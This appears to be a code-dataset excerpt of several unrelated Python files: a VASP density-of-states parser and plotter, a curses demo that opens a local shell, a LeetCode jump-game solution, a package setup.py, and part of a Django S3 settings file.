nBins)\nDOSCARfile.close()\n\n\n# In[4]:\n\n\n##creating pdf\nwith PdfPages(pdosPlots) as pdf:\n for i in range(0,nAtm): ##i is atom index 1 to 6\n DOSCARfile=open(DOSCARfileName,'r')\n it=0\n atm=i+1\n dos=np.zeros((33,nBins)) ##33 columns by so many rows\n totaldos=np.zeros((5,nBins))\n for line in DOSCARfile :\n if ( it>=6+(0+0)*(nBins+1) and it<=4+(0+1)*(nBins+1) ):\n j=it-6\n line=line.split()\n for k in range(0,5):\n totaldos[k,j]=float(line[k])\n if ( it>=6+(atm+0)*(nBins+1) and it<=4+(atm+1)*(nBins+1) ):\n j=it-6-atm*(nBins+1)\n line=line.split()\n for k in range(0,19):\n dos[k,j]=float(line[k])\n it=it+1\n DOSCARfile.close()\n print(dos)\n atomLegend=str(system.get_chemical_symbols()[atm-1])+str(atm)\n plt.rcParams['figure.figsize'] = [11, 8.5] \n lineSUp, =plt.plot(dos[0], dos[1] ,linestyle='-', color='b', linewidth=1.6)\n lineSDn, =plt.plot(dos[0],-dos[2] ,linestyle='-', color='b', linewidth=1.6)\n \n lineTUp, =plt.plot(totaldos[0], totaldos[1]/normTotal ,linestyle=':', color='black', linewidth=1.6)\n lineTDn, =plt.plot(totaldos[0],-totaldos[2]/normTotal ,linestyle=':', color='black', linewidth=1.6)\n \n plt.legend([lineSUp,lineTUp],[atomLegend+'$-s$','$Total$/'+str(normTotal)])\n #plt.suptitle('atom number='+str(atm), fontsize=12)\n \n matplotlib.pyplot.axvline(x=eFermi)\n plt.ylabel('Total DOS (arb. units)')\n #plt.ylim((-6, 6))\n plt.xlabel('Energy (eV)')\n #plt.xlim((-6, 6))\n pdf.savefig() \n #plt.show()\n plt.close()\n \n linePxUp, =plt.plot(dos[0], dos[3] ,linestyle='-', color='g', linewidth=1.6)\n linePxDn, =plt.plot(dos[0],-dos[4] ,linestyle='-', color='g', linewidth=1.6)\n \n linePyUp, =plt.plot(dos[0], dos[5] ,linestyle='-', color='r', linewidth=1.6)\n linePyDn, =plt.plot(dos[0],-dos[6] ,linestyle='-', color='r', linewidth=1.6)\n \n linePzUp, =plt.plot(dos[0], dos[7] ,linestyle='-', color='m', linewidth=1.6)\n linePzDn, =plt.plot(dos[0],-dos[8] ,linestyle='-', color='m', linewidth=1.6)\n \n linePTUp, =plt.plot(dos[0], dos[3]+dos[5]+dos[7], linestyle='-.', color='black', linewidth=1.6)\n linePTDn, =plt.plot(dos[0],-dos[4]-dos[6]-dos[8], linestyle='-.', color='black', linewidth=1.6)\n \n lineTUp, =plt.plot(totaldos[0], totaldos[1]/10 ,linestyle=':', color='black', linewidth=1.6)\n lineTDn, =plt.plot(totaldos[0],-totaldos[2]/10 ,linestyle=':', color='black', linewidth=1.6)\n \n plt.legend([linePxUp,linePyUp,linePzUp,linePTUp,lineTUp],\n [atomLegend+'$-p_x$',atomLegend+'$-p_y$',atomLegend+'$-p_z$',atomLegend+'$-p_{Total}$','$Total$/'+str(normTotal)])\n #plt.suptitle('atom number='+str(atm), fontsize=12)\n \n matplotlib.pyplot.axvline(x=eFermi)\n plt.ylabel('Total DOS (arb. units)')\n #plt.ylim((-6, 6))\n plt.xlabel('Energy (eV)')\n #plt.xlim((-5, 6))\n pdf.savefig() \n #plt.show()\n plt.close()\n \n lineDxyUp, =plt.plot(dos[0], dos[9] ,linestyle='-', color='y', linewidth=1.6)\n lineDxyDn, =plt.plot(dos[0],-dos[10],linestyle='-', color='y', linewidth=1.6)\n \n lineDyzUp, =plt.plot(dos[0], dos[11],linestyle='-', color='k', linewidth=1.6)\n lineDyzDn, =plt.plot(dos[0],-dos[12],linestyle='-', color='k', linewidth=1.6)\n \n lineDzxUp, =plt.plot(dos[0], dos[13],linestyle='-', color='c', linewidth=1.6)\n lineDzxDn, =plt.plot(dos[0],-dos[14],linestyle='-', color='c', linewidth=1.6)\n \n lineDx2y2Up,=plt.plot(dos[0], dos[15],linestyle='-', color='cadetblue', linewidth=1.6)\n lineDx2y2Dn,=plt.plot(dos[0],-dos[16],linestyle='-', color='cadetblue', linewidth=1.6)\n \n lineDz2Up, =plt.plot(dos[0], dos[17],linestyle='-', color='firebrick', linewidth=1.6)\n lineDz2Dn, =plt.plot(dos[0],-dos[18],linestyle='-', color='firebrick', linewidth=1.6)\n \n lineDTUp, =plt.plot(dos[0], dos[ 9]+dos[11]+dos[13]+dos[15]+dos[17],linestyle='-.', color='black', linewidth=1.6)\n lineDTDn, =plt.plot(dos[0],-dos[10]-dos[12]-dos[14]-dos[16]-dos[18],linestyle='-.', color='black', linewidth=1.6)\n \n lineTUp, =plt.plot(totaldos[0], totaldos[1]/10 ,linestyle=':', color='black', linewidth=1.6)\n lineTDn, =plt.plot(totaldos[0],-totaldos[2]/10 ,linestyle=':', color='black', linewidth=1.6)\n \n plt.legend([lineDxyUp,lineDyzUp,lineDzxUp,lineDx2y2Up,lineDz2Up,lineDTUp,lineTUp],\n [atomLegend+'$-d_{xy}$',atomLegend+'$-d_{yz}$',atomLegend+'$-d_{zx}$',\n atomLegend+'$-d_{x^2-y^2}$',atomLegend+'$-d_{z^2}$',atomLegend+'$-d_{Total}$','$Total$/'+str(normTotal)])\n #plt.suptitle('atom number='+str(atm), fontsize=12)\n \n matplotlib.pyplot.axvline(x=eFermi)\n plt.ylabel('Total DOS (arb. units)')\n #plt.ylim((-6, 6))\n plt.xlabel('Energy (eV)')\n #plt.xlim((-5, 6))\n plt.xlabel('Energy (eV)')\n pdf.savefig() \n #plt.show()\n plt.close()\n\n\n# In[5]:\n\n\n###Writing data to files\n\ndef writeTDOS(fName,totaldos,nBins):\n fileName=fName+\".ldos\"+\".dat\"\n fWrite = open(fileName,'w')\n for i in range(nBins):\n writeLine='{0:12.4e} {1:12.4e} {2:12.4e}'.format(totaldos[0,i]-eFermi,totaldos[1,i],-totaldos[2,i])+\"\\n\"\n fWrite.write(writeLine)\n fWrite.close()\n fileName=fName+\".dos\"+\".dat\"\n fWrite = open(fileName,'w')\n for i in range(nBins):\n writeLine='{0:12.4e} {1:12.4e}'.format(totaldos[0,i]-eFermi,totaldos[1,i]+totaldos[2,i])+\"\\n\"\n fWrite.write(writeLine)\n fWrite.close()\n\ndef writeDOS(fName,totaldos,nBins):\n \n #sssssssssssssssssssssssssssssssss\n fileName=fName+\".01-s.up\"+\".ldos\"+\".dat\"\n fWrite = open(fileName,'w')\n for i in range(nBins):\n writeLine='{0:12.4e} {1:12.4e}'.format(dos[0,i]-eFermi,dos[1,i])+\"\\n\"\n fWrite.write(writeLine)\n fWrite.close() \n fileName=fName+\".02-s.dn\"+\".ldos\"+\".dat\"\n fWrite = open(fileName,'w')\n for i in range(nBins):\n writeLine='{0:12.4e} {1:12.4e}'.format(dos[0,i]-eFermi,-dos[2,i])+\"\\n\"\n fWrite.write(writeLine)\n fWrite.close()\n fileName=fName+\".33-s.tot\"+\".pdos\"+\".dat\"\n fWrite = open(fileName,'w')\n for i in range(nBins):\n writeLine='{0:12.4e} {1:12.4e}'.format(dos[0,i]-eFermi,dos[1,i]+dos[2,i])+\"\\n\"\n fWrite.write(writeLine)\n fWrite.close()\n \n #pxpxpxpxpxpxpxpxpxpxpxpxpxpxpxpxpxpxpx\n fileName=fName+\".03-px.up\"+\".ldos\"+\".dat\"\n fWrite = open(fileName,'w')\n for i in range(nBins):\n writeLine='{0:12.4e} {1:12.4e}'.format(dos[0,i]-eFermi,dos[3,i])+\"\\n\"\n fWrite.write(writeLine)\n fWrite.close() \n fileName=fName+\".04-px.dn\"+\".ldos\"+\".dat\"\n fWrite = open(fileName,'w')\n for i in range(nBins):\n writeLine='{0:12.4e} {1:12.4e}'.format(dos[0,i]-eFermi,-dos[4,i])+\"\\n\"\n fWrite.write(writeLine)\n fWrite.close()\n fileName=fName+\".34-px.tot\"+\".pdos\"+\".dat\"\n fWrite = open(fileName,'w')\n for i in range(nBins):\n writeLine='{0:12.4e} {1:12.4e}'.format(dos[0,i]-eFermi,dos[3,i]+dos[4,i])+\"\\n\"\n fWrite.write(writeLine)\n fWrite.close()\n #pypypypypypypypypypypypypypypypypypypy\n fileName=fName+\".05-py.up\"+\".ldos\"+\".dat\"\n fWrite = open(fileName,'w')\n for i in range(nBins):\n writeLine='{0:12.4e} {1:12.4e}'.format(dos[0,i]-eFermi,dos[5,i])+\"\\n\"\n fWrite.write(writeLine)\n fWrite.close() \n fileName=fName+\".06-py.dn\"+\".ldos\"+\".dat\"\n fWrite = open(fileName,'w')\n for i in range(nBins):\n writeLine='{0:12.4e} {1:12.4e}'.format(dos[0,i]-eFermi,-dos[6,i])+\"\\n\"\n fWrite.write(writeLine)\n fWrite.close()\n fileName=fName+\".35-py.tot\"+\".pdos\"+\".dat\"\n fWrite = open(fileName,'w')\n for i in range(nBins):\n writeLine='{0:12.4e} {1:12.4e}'.format(dos[0,i]-eFermi,dos[5,i]+dos[6,i])+\"\\n\"\n fWrite.write(writeLine)\n fWrite.close()\n #pzpzpzpzpzpzpzpzpzpzpzpzpzpzpzpzpzpzpz\n fileName=fName+\".07-pz.up\"+\".ldos\"+\".dat\"\n fWrite = open(fileName,'w')\n for i in range(nBins):\n writeLine='{0:12.4e} {1:12.4e}'.format(dos[0,i]-eFermi,dos[7,i])+\"\\n\"\n fWrite.write(writeLine)\n fWrite.close() \n fileName=fName+\".08-pz.dn\"+\".ldos\"+\".dat\"\n fWrite = open(fileName,'w')\n for i in range(nBins):\n writeLine='{0:12.4e} {1:12.4e}'.format(dos[0,i]-eFermi,-dos[8,i])+\"\\n\"\n fWrite.write(writeLine)\n fWrite.close()\n fileName=fName+\".36-pz.tot\"+\".pdos\"+\".dat\"\n fWrite = open(fileName,'w')\n for i in range(nBins):\n writeLine='{0:12.4e} {1:12.4e}'.format(dos[0,i]-eFermi,dos[7,i]+dos[8,i])+\"\\n\"\n fWrite.write(writeLine)\n fWrite.close()\n #ppppppppppppppppppppppppppppppppppppppp\n fileName=fName+\".37-p.up\"+\".ldos\"+\".dat\"\n fWrite = open(fileName,'w')\n for i in range(nBins):\n writeLine='{0:12.4e} {1:12.4e}'.format(dos[0,i]-eFermi,dos[3,i]+dos[5,i]+dos[7,i])+\"\\n\"\n fWrite.write(writeLine)\n fWrite.close() \n fileName=fName+\".38-p.dn\"+\".ldos\"+\".dat\"\n fWrite = open(fileName,'w')\n for i in range(nBins):\n writeLine='{0:12.4e} {1:12.4e}'.format(dos[0,i]-eFermi,-dos[4,i]-dos[6,i]-dos[8,i])+\"\\n\"\n fWrite.write(writeLine)\n fWrite.close()\n fileName=fName+\".39-p.tot\"+\".pdos\"+\".dat\"\n fWrite = open(fileName,'w')\n for i in range(nBins):\n writeLine='{0:12.4e} {1:12.4e}'.format(dos[0,i]-eFermi,dos[3,i]+dos[4,i]+dos[5,i]+dos[6,i]+dos[7,i]+dos[8,i])+\"\\n\"\n fWrite.write(writeLine)\n fWrite.close()\n\n #dxydxydxydxydxydxydxydxydxydxydxydxydxy\n fileName=fName+\".09-dxy.up\"+\".ldos\"+\".dat\"\n fWrite = open(fileName,'w')\n for i in range(nBins):\n writeLine='{0:12.4e} {1:12.4e}'.format(dos[0,i]-eFermi,dos[9,i])+\"\\n\"\n fWrite.write(writeLine)\n fWrite.close() \n fileName=fName+\".10-dxy.dn\"+\".ldos\"+\".dat\"\n fWrite = open(fileName,'w')\n for i in range(nBins):\n writeLine='{0:12.4e} {1:12.4e}'.format(dos[0,i]-eFermi,-dos[10,i])+\"\\n\"\n fWrite.write(writeLine)\n fWrite.close()\n fileName=fName+\".40-dxy.tot\"+\".pdos\"+\".dat\"\n fWrite = open(fileName,'w')\n for i in range(nBins):\n writeLine='{0:12.4e} {1:12.4e}'.format(dos[0,i]-eFermi,dos[9,i]+dos[10,i])+\"\\n\"\n fWrite.write(writeLine)\n fWrite.close()\n #dyzdyzdyzdyzdyzdyzdyzdyzdyzdyzdyzdyzdyz\n fileName=fName+\".11-dyz.up\"+\".ldos\"+\".dat\"\n fWrite = open(fileName,'w')\n for i in range(nBins):\n writeLine='{0:12.4e} {1:12.4e}'.format(dos[0,i]-eFermi,dos[11,i])+\"\\n\"\n fWrite.write(writeLine)\n fWrite.close() \n fileName=fName+\".12-dyz.dn\"+\".ldos\"+\".dat\"\n fWrite = open(fileName,'w')\n for i in range(nBins):\n writeLine='{0:12.4e} {1:12.4e}'.format(dos[0,i]-eFermi,-dos[12,i])+\"\\n\"\n fWrite.write(writeLine)\n fWrite.close()\n fileName=fName+\".41-dyz.tot\"+\".pdos\"+\".dat\"\n fWrite = open(fileName,'w')\n for i in range(nBins):\n writeLine='{0:12.4e} {1:12.4e}'.format(dos[0,i]-eFermi,dos[11,i]+dos[12,i])+\"\\n\"\n fWrite.write(writeLine)\n fWrite.close()\n #dzxdzxdzxdzxdzxdzxdzxdzxdzxdzxdzxdzxdzx\n fileName=fName+\".13-dzx.up\"+\".ldos\"+\".dat\"\n fWrite = open(fileName,'w')\n for i in range(nBins):\n writeLine='{0:12.4e} {1:12.4e}'.format(dos[0,i]-eFermi,dos[13,i])+\"\\n\"\n fWrite.write(writeLine)\n fWrite.close() \n fileName=fName+\".14-dzx.dn\"+\".ldos\"+\".dat\"\n fWrite = open(fileName,'w')\n for i in range(nBins):\n writeLine='{0:12.4e} {1:12.4e}'.format(dos[0,i]-eFermi,-dos[14,i])+\"\\n\"\n fWrite.write(writeLine)\n fWrite.close()\n fileName=fName+\".42-dzx.tot\"+\".pdos\"+\".dat\"\n fWrite = open(fileName,'w')\n for i in range(nBins):\n writeLine='{0:12.4e} {1:12.4e}'.format(dos[0,i]-eFermi,dos[13,i]+dos[14,i])+\"\\n\"\n fWrite.write(writeLine)\n fWrite.close()\n #dx2y2dx2y2dx2y2dx2y2dx2y2dx2y2dx2y2dx2y2\n fileName=fName+\".15-dx2y2.up\"+\".ldos\"+\".dat\"\n fWrite = open(fileName,'w')\n for i in range(nBins):\n writeLine='{0:12.4e} {1:12.4e}'.format(dos[0,i]-eFermi,dos[15,i])+\"\\n\"\n fWrite.write(writeLine)\n fWrite.close() \n fileName=fName+\".16-dx2y2.dn\"+\".ldos\"+\".dat\"\n fWrite = open(fileName,'w')\n for i in range(nBins):\n writeLine='{0:12.4e} {1:12.4e}'.format(dos[0,i]-eFermi,-dos[16,i])+\"\\n\"\n fWrite.write(writeLine)\n fWrite.close()\n fileName=fName+\".43-dx2y2.tot\"+\".pdos\"+\".dat\"\n fWrite = open(fileName,'w')\n for i in range(nBins):\n writeLine='{0:12.4e} {1:12.4e}'.format(dos[0,i]-eFermi,dos[15,i]+dos[16,i])+\"\\n\"\n fWrite.write(writeLine)\n fWrite.close()\n #dz2dz2dz2dz2dz2dz2dz2dz2dz2dz2dz2dz2dz2dz2\n fileName=fName+\".17-dz2.up\"+\".ldos\"+\".dat\"\n fWrite = open(fileName,'w')\n for i in range(nBins):\n writeLine='{0:12.4e} {1:12.4e}'.format(dos[0,i]-eFermi,dos[17,i])+\"\\n\"\n fWrite.write(writeLine)\n fWrite.close() \n fileName=fName+\".18-dz2.dn\"+\".ldos\"+\".dat\"\n fWrite = open(fileName,'w')\n for i in range(nBins):\n writeLine='{0:12.4e} {1:12.4e}'.format(dos[0,i]-eFermi,-dos[18,i])+\"\\n\"\n fWrite.write(writeLine)\n fWrite.close()\n fileName=fName+\".44-dz2.tot\"+\".pdos\"+\".dat\"\n fWrite = open(fileName,'w')\n for i in range(nBins):\n writeLine='{0:12.4e} {1:12.4e}'.format(dos[0,i]-eFermi,dos[17,i]+dos[18,i])+\"\\n\"\n fWrite.write(writeLine)\n fWrite.close()\n #dddddddddddddddddddddddddddddddddddddddddddd\n fileName=fName+\".45-d.up\"+\".ldos\"+\".dat\"\n fWrite = open(fileName,'w')\n for i in range(nBins):\n writeLine='{0:12.4e} {1:12.4e}'.format(dos[0,i]-eFermi,dos[ 9,i]+dos[11,i]+dos[13,i]+dos[15,i]+dos[17,i])+\"\\n\"\n fWrite.write(writeLine)\n fWrite.close() \n fileName=fName+\".46-d.dn\"+\".ldos\"+\".dat\"\n fWrite = open(fileName,'w')\n for i in range(nBins):\n writeLine='{0:12.4e} {1:12.4e}'.format(dos[0,i]-eFermi,-dos[10,i]-dos[12,i]-dos[14,i]-dos[16,i]-dos[18,i])+\"\\n\"\n fWrite.write(writeLine)\n fWrite.close()\n fileName=fName+\".47-d.tot\"+\".pdos\"+\".dat\"\n fWrite = open(fileName,'w')\n for i in range(nBins):\n writeLine='{0:12.4e} {1:12.4e}'.format(dos[0,i]-eFermi,dos[ 9,i]+dos[10,i]+dos[11,i]+dos[12,i]+dos[13,i]+dos[14,i]+dos[15,i]+dos[16,i]+dos[17,i]+dos[18,i])+\"\\n\"\n fWrite.write(writeLine)\n fWrite.close()\n #f-3\n fileName=fName+\".19-f-3.up\"+\".ldos\"+\".dat\"\n fWrite = open(fileName,'w')\n for i in range(nBins):\n writeLine='{0:12.4e} {1:12.4e}'.format(dos[0,i]-eFermi,dos[19,i])+\"\\n\"\n fWrite.write(writeLine)\n fWrite.close() \n fileName=fName+\".20-f-3.dn\"+\".ldos\"+\".dat\"\n fWrite = open(fileName,'w')\n for i in range(nBins):\n writeLine='{0:12.4e} {1:12.4e}'.format(dos[0,i]-eFermi,-dos[20,i])+\"\\n\"\n fWrite.write(writeLine)\n fWrite.close()\n fileName=fName+\".48-f-3.tot\"+\".pdos\"+\".dat\"\n fWrite = open(fileName,'w')\n for i in range(nBins):\n writeLine='{0:12.4e} {1:12.4e}'.format(dos[0,i]-eFermi,dos[9,i]+dos[10,i])+\"\\n\"\n fWrite.write(writeLine)\n fWrite.close()\n #f-2\n fileName=fName+\".21-f-2.up\"+\".ldos\"+\".dat\"\n fWrite = open(fileName,'w')\n for i in range(nBins):\n writeLine='{0:12.4e} {1:12.4e}'.format(dos[0,i]-eFermi,dos[21,i])+\"\\n\"\n fWrite.write(writeLine)\n fWrite.close() \n fileName=fName+\".22-f-2.dn\"+\".ldos\"+\".dat\"\n fWrite = open(fileName,'w')\n for i in range(nBins):\n writeLine='{0:12.4e} {1:12.4e}'.format(dos[0,i]-eFermi,-dos[22,i])+\"\\n\"\n fWrite.write(writeLine)\n fWrite.close()\n fileName=fName+\".49-f-2.tot\"+\".pdos\"+\".dat\"\n fWrite = open(fileName,'w')\n for i in range(nBins):\n writeLine='{0:12.4e} {1:12.4e}'.format(dos[0,i]-eFermi,dos[11,i]+dos[12,i])+\"\\n\"\n fWrite.write(writeLine)\n fWrite.close()\n #f-1\n fileName=fName+\".23-f-1.up\"+\".ldos\"+\".dat\"\n fWrite = open(fileName,'w')\n for i in range(nBins):\n writeLine='{0:12.4e} {1:12.4e}'.format(dos[0,i]-eFermi,dos[23,i])+\"\\n\"\n fWrite.write(writeLine)\n fWrite.close() \n fileName=fName+\".24-f-1.dn\"+\".ldos\"+\".dat\"\n fWrite = open(fileName,'w')\n for i in range(nBins):\n writeLine='{0:12.4e} {1:12.4e}'.format(dos[0,i]-eFermi,-dos[24,i])+\"\\n\"\n fWrite.write(writeLine)\n fWrite.close()\n fileName=fName+\".50-f-1.tot\"+\".pdos\"+\".dat\"\n fWrite = open(fileName,'w')\n for i in range(nBins):\n writeLine='{0:12.4e} {1:12.4e}'.format(dos[0,i]-eFermi,dos[13,i]+dos[14,i])+\"\\n\"\n fWrite.write(writeLine)\n fWrite.close()\n #f0\n fileName=fName+\".25-f0.up\"+\".ldos\"+\".dat\"\n fWrite = open(fileName,'w')\n for i in range(nBins):\n writeLine='{0:12.4e} {1:12.4e}'.format(dos[0,i]-eFermi,dos[25,i])+\"\\n\"\n fWrite.write(writeLine)\n fWrite.close() \n fileName=fName+\".26-f0.dn\"+\".ldos\"+\".dat\"\n fWrite = open(fileName,'w')\n for i in range(nBins):\n writeLine='{0:12.4e} {1:12.4e}'.format(dos[0,i]-eFermi,-dos[26,i])+\"\\n\"\n fWrite.write(writeLine)\n fWrite.close()\n fileName=fName+\".51-f0.tot\"+\".pdos\"+\".dat\"\n fWrite = open(fileName,'w')\n for i in range(nBins):\n writeLine='{0:12.4e} {1:12.4e}'.format(dos[0,i]-eFermi,dos[15,i]+dos[16,i])+\"\\n\"\n fWrite.write(writeLine)\n fWrite.close()\n #f1\n fileName=fName+\".27-f1.up\"+\".ldos\"+\".dat\"\n fWrite = open(fileName,'w')\n for i in range(nBins):\n writeLine='{0:12.4e} {1:12.4e}'.format(dos[0,i]-eFermi,dos[27,i])+\"\\n\"\n fWrite.write(writeLine)\n fWrite.close() \n fileName=fName+\".28-f1.dn\"+\".ldos\"+\".dat\"\n fWrite = open(fileName,'w')\n for i in range(nBins):\n writeLine='{0:12.4e} {1:12.4e}'.format(dos[0,i]-eFermi,-dos[28,i])+\"\\n\"\n fWrite.write(writeLine)\n fWrite.close()\n fileName=fName+\".52-f1.tot\"+\".pdos\"+\".dat\"\n fWrite = open(fileName,'w')\n for i in range(nBins):\n writeLine='{0:12.4e} {1:12.4e}'.format(dos[0,i]-eFermi,dos[17,i]+dos[18,i])+\"\\n\"\n fWrite.write(writeLine)\n fWrite.close()\n #f2\n fileName=fName+\".29-f2.up\"+\".ldos\"+\".dat\"\n fWrite = open(fileName,'w')\n for i in range(nBins):\n writeLine='{0:12.4e} {1:12.4e}'.format(dos[0,i]-eFermi,dos[29,i])+\"\\n\"\n fWrite.write(writeLine)\n fWrite.close() \n fileName=fName+\".30-f2.dn\"+\".ldos\"+\".dat\"\n fWrite = open(fileName,'w')\n for i in range(nBins):\n writeLine='{0:12.4e} {1:12.4e}'.format(dos[0,i]-eFermi,-dos[30,i])+\"\\n\"\n fWrite.write(writeLine)\n fWrite.close()\n fileName=fName+\".f3-f2.tot\"+\".pdos\"+\".dat\"\n fWrite = open(fileName,'w')\n for i in range(nBins):\n writeLine='{0:12.4e} {1:12.4e}'.format(dos[0,i]-eFermi,dos[17,i]+dos[18,i])+\"\\n\"\n fWrite.write(writeLine)\n fWrite.close()\n #f3\n fileName=fName+\".31-f3.up\"+\".ldos\"+\".dat\"\n fWrite = open(fileName,'w')\n for i in range(nBins):\n writeLine='{0:12.4e} {1:12.4e}'.format(dos[0,i]-eFermi,dos[31,i])+\"\\n\"\n fWrite.write(writeLine)\n fWrite.close() \n fileName=fName+\".32-f3.dn\"+\".ldos\"+\".dat\"\n fWrite = open(fileName,'w')\n for i in range(nBins):\n writeLine='{0:12.4e} {1:12.4e}'.format(dos[0,i]-eFermi,-dos[32,i])+\"\\n\"\n fWrite.write(writeLine)\n fWrite.close()\n fileName=fName+\".54-f3.tot\"+\".pdos\"+\".dat\"\n fWrite = open(fileName,'w')\n for i in range(nBins):\n writeLine='{0:12.4e} {1:12.4e}'.format(dos[0,i]-eFermi,dos[17,i]+dos[18,i])+\"\\n\"\n fWrite.write(writeLine)\n fWrite.close()\n #f-total\n fileName=fName+\".55-f.up\"+\".ldos\"+\".dat\"\n fWrite = open(fileName,'w')\n for i in range(nBins):\n writeLine='{0:12.4e} {1:12.4e}'.format(dos[0,i]-eFermi,dos[ 9,i]+dos[11,i]+dos[13,i]+dos[15,i]+dos[17,i])+\"\\n\"\n fWrite.write(writeLine)\n fWrite.close() \n fileName=fName+\".56-f.dn\"+\".ldos\"+\".dat\"\n fWrite = open(fileName,'w')\n for i in range(nBins):\n writeLine='{0:12.4e} {1:12.4e}'.format(dos[0,i]-eFermi,-dos[10,i]-dos[12,i]-dos[14,i]-dos[16,i]-dos[18,i])+\"\\n\"\n fWrite.write(writeLine)\n fWrite.close()\n fileName=fName+\".57-f.tot\"+\".pdos\"+\".dat\"\n fWrite = open(fileName,'w')\n for i in range(nBins):\n writeLine='{0:12.4e} {1:12.4e}'.format(dos[0,i]-eFermi,dos[ 9,i]+dos[10,i]+dos[11,i]+dos[12,i]+dos[13,i]+dos[14,i]+dos[15,i]+dos[16,i]+dos[17,i]+dos[18,i])+\"\\n\"\n fWrite.write(writeLine)\n fWrite.close()\n\n #atomatomatomatomatomatomatomatomatomatomatom\n fileName=fName+\".58-up\"+\".ldos\"+\".dat\"\n fWrite = open(fileName,'w')\n for i in range(nBins):\n writeLine='{0:12.4e} {1:12.4e}'.format(dos[0,i]-eFermi,dos[1,i]+dos[3,i]+dos[5,i]+dos[7,i]+dos[ 9,i]+dos[11,i]+dos[13,i]+dos[15,i]+dos[17,i])+\"\\n\"\n fWrite.write(writeLine)\n fWrite.close() \n fileName=fName+\".59-dn\"+\".ldos\"+\".dat\"\n fWrite = open(fileName,'w')\n for i in range(nBins):\n writeLine='{0:12.4e} {1:12.4e}'.format(dos[0,i]-eFermi,-dos[2,i]-dos[4,i]-dos[6,i]-dos[8,i]-dos[10,i]-dos[12,i]-dos[14,i]-dos[16,i]-dos[18,i])+\"\\n\"\n fWrite.write(writeLine)\n fWrite.close()\n fileName=fName+\".60-tot\"+\".pdos\"+\".dat\"\n fWrite = open(fileName,'w')\n for i in range(nBins):\n writeLine='{0:12.4e} {1:12.4e}'.format(dos[0,i]-eFermi,dos[1,i]+dos[2,i]+dos[3,i]+dos[4,i]+dos[ 5,i]+dos[6,i]+dos[7,i]+dos[8,i]+dos[9,i]+dos[10,i]+dos[11,i]+dos[12,i]+dos[13,i]+dos[14,i]+dos[15,i]+dos[16,i]+dos[17,i]+dos[18,i])+\"\\n\"\n fWrite.write(writeLine)\n fWrite.close()\n \nfor i in range(nAtm):\n if (i==0) :\n fName=OUTDIR+\"/\"+\"000.total\"\n writeTDOS(fName,totaldos,nBins)\n fName=OUTDIR+\"/\"+str('{0:03d}'.format(i+1))+str(system.get_chemical_symbols()[i])\n writeDOS(fName,dos,nBins)\n\n\n# In[6]:\n\n\nprint(\"done\")\n\n\n# In[ ]:\n","sub_path":"VASP_LDOS.py","file_name":"VASP_LDOS.py","file_ext":"py","file_size_in_byte":27078,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"529610028","text":"import curses\nimport subprocess\nimport os\n\n# Create a screen and print hello\nscreen = curses.initscr()\nscreen.addstr(\"Hello! Dropping you in to a command prompt...\\n\")\nprint(\"Program initialized...\")\nscreen.refresh()\nscreen.getkey()\n\n# Hide the screen, show original terminal, restore cursor position\ncurses.endwin()\n\n# Update screen in background\nscreen.addstr(\"I'll be waiting for you when you return.\\n\")\n\n# Drop the user in a command prompt\nprint(\"About to open command prompt...\")\nscreen.getkey()\n\nif os.name == \"nt\":\n shell = \"pwsh.exe\"\nelse:\n shell = \"bash\"\n\nsubprocess.call(shell)\n\n# When the subprocess ends, return to our screen.\n# also restoring cursor position\nscreen.refresh()\nscreen.getkey()\n\n# Finally go back to the terminal for real\ncurses.endwin()\n","sub_path":"shell_out_example.py","file_name":"shell_out_example.py","file_ext":"py","file_size_in_byte":772,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"490098991","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Wed Apr 24 23:18:42 2019\r\n\r\n@author: binxi\r\n\"\"\"\r\n\r\nclass Solution(object):\r\n def canJump(self, nums):\r\n \"\"\"\r\n :type nums: List[int]\r\n :rtype: bool\r\n \"\"\"\r\n jumpable = [False]*len(nums)\r\n jumpable = jumpable[:]\r\n jumpable[0] = True\r\n latest = 0\r\n \r\n for i in range(0,len(nums),1):\r\n if jumpable[i]:\r\n x = i+nums[i]\r\n if x>= len(nums)-1:\r\n return True\r\n exit\r\n elif x > latest:\r\n for j in range(latest+1,min(x+1,len(nums)),1):\r\n jumpable[j] = True\r\n latest = x\r\n else:\r\n break\r\n \r\n return jumpable[-1]","sub_path":"Leetcode/#55 Jump Game.py","file_name":"#55 Jump Game.py","file_ext":"py","file_size_in_byte":807,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"418024460","text":"from setuptools import setup\n\nNAME = \"partb\"\nVERSION = \"0.4.0\"\nDESCRIPTION = \"Predictive Analytics for Readmission: a Toolbox in Python\"\nKEYWORDS = \"Predictive Data Analytics Readmission Toolbox\"\nAUTHOR = \"Arkaitz Artetxe\"\nAUTHOR_EMAIL = \"aartetxe@vicomtech.org\"\nURL = \"https://github.com/aartetxe/par-toolbox\"\n\nsetup(\n name=NAME,\n version=VERSION,\n description=DESCRIPTION,\n keywords=KEYWORDS,\n author=AUTHOR,\n author_email=AUTHOR_EMAIL,\n url=URL,\n packages=['partb', 'partb.classification', 'partb.visualization', 'partb.descriptive', 'partb.utility'],\n install_requires=['numpy', 'sklearn', 'scipy', 'matplotlib', 'seaborn', 'pandas', 'imblearn']\n)\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":679,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"500013189","text":"import os\nfrom .base import BASE_DIR\n\nAWS_ACCESS_KEY_ID = os.getenv('AWS_ACCESS_KEY_ID')\nAWS_SECRET_ACCESS_KEY = os.getenv('AWS_SECRET_ACCESS_KEY')\nAWS_STORAGE_BUCKET_NAME = os.getenv('AWS_STORAGE_BUCKET_NAME')\nAWS_S3_CUSTOM_DOMAIN = '%s.s3.amazonaws.com' % AWS_STORAGE_BUCKET_NAME\nAWS_S3_OBJECT_PARAMETERS = {\n 'CacheControl': 'max-age=86400',\n}\nAWS_LOCATION = 'static'\nAWS_DEFAULT_ACL = None\n\nSTATICFILES_STORAGE = 'storages.backends.s3boto3.S3Boto3Storage'\nDEFAULT_FILE_STORAGE = 'gtszrcp.settings.storage_backends.MediaStorage'\n\nif int(os.getenv('DJANGO_DEBUG', 1)) == 1:\n AWS_LOCATION = 'dev-static'\n\nSTATIC_URL = \"https://%s/%s/\" % (AWS_S3_CUSTOM_DOMAIN, 